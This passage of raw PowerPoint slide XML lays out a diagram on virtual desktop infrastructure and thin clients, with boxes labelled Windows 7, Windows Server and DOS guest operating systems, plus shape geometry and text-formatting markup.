              <a:t>Gu</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-40">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>es</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-25">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>t</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-90">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="5">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>OS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304519" y="3924300"/>
            <a:ext cx="1426845" cy="81724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154305" rIns="0" bIns="0" rtlCol="0" vert="horz">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="275590" marR="187960" indent="-79375">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1215"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="10">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Wi</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="15">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-25">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>d</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-5">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>o</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-20">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>w</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-55">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-85">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-70">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>7  </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-5">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Gu</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-40">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>es</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-25">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>t</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-90">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="5">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>OS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667743" y="5957315"/>
            <a:ext cx="1428115" cy="80518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26034" rIns="0" bIns="0" rtlCol="0" vert="horz">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" marL="276225" marR="266700" indent="-635">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="204"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="10">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Wi</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="15">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-25">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>d</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-5">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>o</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-20">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>w</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-45">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>s  </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-5">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Server </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-5">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Gu</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-40">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>es</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-25">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>t</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-90">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="5">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>OS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667743" y="4925567"/>
            <a:ext cx="1428115" cy="80518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147955" rIns="0" bIns="0" rtlCol="0" vert="horz">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" marL="2540">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1165"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-10">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>DOS</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Lucida Sans Unicode"/>
              <a:cs typeface="Lucida Sans Unicode"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" marL="1270">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="5"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-5">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Gu</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-40">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>es</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-25">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>t</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-90">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="5">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>OS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287756" y="4925567"/>
            <a:ext cx="1426845" cy="81724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154305" rIns="0" bIns="0" rtlCol="0" vert="horz">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="275590" marR="187960" indent="-79375">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1215"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="10">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Wi</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="15">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-25">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>d</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-5">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>o</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-20">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>w</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-55">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-85">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-70">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>7  </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-5">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Gu</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-40">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>es</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-25">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>t</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-90">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="5">
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>OS</a:t>
            </a:r>
            <a:endParaRPr sz="1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43603" y="306451"/>
            <a:ext cx="836930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95">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Virtual</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-114">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="150">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Desktop</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-105">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="105">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Infrastructure</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-105">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="175">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>and</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-114">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="65">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Thin</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-100">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="80">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Clients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6688" y="760476"/>
            <a:ext cx="11554967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244346" y="3487673"/>
            <a:ext cx="6160135" cy="3657600"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="6160134" h="3657600">
                <a:moveTo>
                  <a:pt x="0" y="609600"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1834" y="561959"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7245" y="515322"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16099" y="469822"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="28260" y="425597"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="43592" y="382782"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="61959" y="341511"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="83227" y="301921"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="107259" y="264147"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="133920" y="228324"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="163075" y="194588"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="194588" y="163075"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="228324" y="133920"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="264147" y="107259"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="301921" y="83227"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="341511" y="61959"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="382782" y="43592"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="425597" y="28260"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="469822" y="16099"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="515322" y="7245"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="561959" y="1834"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="609599" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5550408" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5598048" y="1834"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5644685" y="7245"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5690185" y="16099"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5734410" y="28260"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5777225" y="43592"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5818496" y="61959"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5858086" y="83227"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5895860" y="107259"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5931683" y="133920"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5965419" y="163075"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5996932" y="194588"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6026087" y="228324"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6052748" y="264147"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6076780" y="301921"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6098048" y="341511"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6116415" y="382782"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6131747" y="425597"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6143908" y="469822"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6152762" y="515322"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6158173" y="561959"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6160008" y="609600"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6160008" y="3048000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6158173" y="3095640"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6152762" y="3142277"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6143908" y="3187777"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6131747" y="3232002"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6116415" y="3274817"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6098048" y="3316088"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6076780" y="3355678"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6052748" y="3393452"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6026087" y="3429275"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5996932" y="3463011"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5965419" y="3494524"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5931683" y="3523679"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5895860" y="3550340"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5858086" y="3574372"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5818496" y="3595640"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5777225" y="3614007"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5734410" y="3629339"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5690185" y="3641500"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5644685" y="3650354"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5598048" y="3655765"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5550408" y="3657600"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="609599" y="3657600"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="561959" y="3655765"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="515322" y="3650354"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="469822" y="3641500"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="425597" y="3629339"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="382782" y="3614007"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="341511" y="3595640"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="301921" y="3574372"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="264147" y="3550340"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="228324" y="3523679"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="194588" y="3494524"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="163075" y="3463011"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="133920" y="3429275"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="107259" y="3393452"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="83227" y="3355678"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="61959" y="3316088"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="43592" y="3274817"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="28260" y="3232002"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16099" y="3187777"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7245" y="3142277"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1834" y="3095640"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3048000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="609600"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="28574">
            <a:solidFill>
              <a:srgbClr val="39405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550669" y="5072889"/>
            <a:ext cx="4429125" cy="79057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342265" indent="-342265">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="470"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial MT"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="342265" algn="l"/>
                <a:tab pos="355600" algn="l"/>
              </a:tabLst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st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images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cl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ent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(OS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95">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>+</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:latin typeface="Lucida Sans Unicode"/>
              <a:cs typeface="Lucida Sans Unicode"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" marR="37465">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="370"/>
              </a:spcBef>
            </a:pP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application)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dirty="0" sz="2200" spc="-14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client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server.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30551" y="3035807"/>
            <a:ext cx="4410710" cy="984885"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="4410709" h="984885">
                <a:moveTo>
                  <a:pt x="4246372" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="164084" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="120444" y="5857"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="81242" y="22389"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="48037" y="48037"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22389" y="81242"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5857" y="120444"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="164083"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="820419"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5857" y="864059"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22389" y="903261"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="48037" y="936466"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="81242" y="962114"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="120444" y="978646"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="164084" y="984503"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4246372" y="984503"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4290011" y="978646"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4329213" y="962114"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4362418" y="936466"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4388066" y="903261"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4404598" y="864059"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4410456" y="820419"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4410456" y="164083"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4404598" y="120444"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4388066" y="81242"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4362418" y="48037"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4329213" y="22389"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4290011" y="5857"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4246372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384298" y="3165093"/>
            <a:ext cx="3901440" cy="69723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644650" marR="5080" indent="-1632585">
              <a:lnSpc>
                <a:spcPct val="100499"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="80"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-75">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Vir</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-6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ual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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Desktop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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Infrastr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ucture  </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-70">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>(VDI)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888730" y="3492246"/>
            <a:ext cx="6160135" cy="3653154"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="6160134" h="3653154">
                <a:moveTo>
                  <a:pt x="0" y="608838"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1831" y="561251"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7235" y="514668"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16077" y="469223"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="28221" y="425050"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="43532" y="382287"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="61875" y="341067"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="83114" y="301526"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="107114" y="263799"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="133740" y="228022"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="162857" y="194330"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="194330" y="162857"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="228022" y="133740"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="263799" y="107114"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="301526" y="83114"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="341067" y="61875"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="382287" y="43532"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="425050" y="28221"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="469223" y="16077"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="514668" y="7235"/>
